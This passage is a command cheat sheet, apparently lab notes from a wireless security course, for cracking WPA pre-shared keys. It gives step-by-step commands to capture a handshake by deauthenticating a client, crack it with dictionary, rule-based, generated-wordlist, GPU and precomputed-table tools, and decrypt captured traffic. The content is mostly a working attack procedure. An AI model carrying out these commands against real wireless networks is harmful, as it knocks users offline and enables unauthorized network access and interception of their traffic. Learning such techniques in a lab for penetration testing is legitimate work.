d. PSK Cracking

Crack walkthrough:

  1. Sniff nearby APs:
sudo airodump-ng wlan0mon
  1. Tune dump with channel and SSIDs:
sudo airodump-ng -c 3 -w wpa --essid wifu --bssid 34:08:04:09:3D:38 wlan0mon
  1. Start deauth:
sudo aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F wlan0mon
  1. Crack handshake:
aircrack-ng -w /usr/share/john/password.lst -e wifu -b 34:08:04:09:3D:38 wpa-01.cap
  1. Decrypt traffic:
airdecap-ng -b 34:08:04:09:3D:38 -e wifu -p 12345678 wpa-01.cap

John cracking:

john --wordlist=/usr/share/john/password.lst --rules --stdout | aircrack-ng -e wifu -w - ~/wpa-01.cap

Crunch:

crunch <minlength> <maxlength> <characters> -t <pattern> -p <words>

crunch 11 11 0123456789 -t password@@@
-
Crunch will now generate the following number of lines: 1000
password000
password001
password002
password003

crunch 5 5 -t ddd% | aircrack-ng -e wifu crunch-01.cap -w -

RSMangler

rsmangler --file wordlist.txt --min 12 --max 13 --output mangled.txt

Use with aircrack:

rsmangler --file wordlist.txt --min 12 --max 13 | aircrack-ng -e wifu rsmangler-01.cap -w -

Hashcat

hashcat -I

hashcat -b -m <mode>

hashcat -d <device-nr>

hashcat -D <device-type>

/usr/lib/hashcat-utils/cap2hccapx.bin wifu-01.cap output.hccapx  

hashcat -m 2500 output.hccapx /usr/share/john/password.lst

Airolib-ng

  1. Create file containing ESSID of target AP:
echo wifu > essid.txt
  1. Import ESSID into database:
airolib-ng <db-name>.sqlite --import essid essid.txt
  1. List info about DB:
airolib-ng <db-name>.sqlite --stats
  1. Import passwords to DB:
airolib-ng <db-name>.sqlite --import passwd /usr/share/john/password.lst
  1. Process DB and generate PMKs:
airolib-ng <db-name>.sqlite --batch
  1. Initiate crack:
aircrack-ng -r <db-name>.sqlite wpa1-01.cap

coWPAtty:

  1. Generate table:
genpmk -f /usr/share/john/password.lst -d <outfile> -s <essid>
  1. Crack with coWPAtty:
cowpatty -r wpajohn-01.cap -d <outfile> -s wifu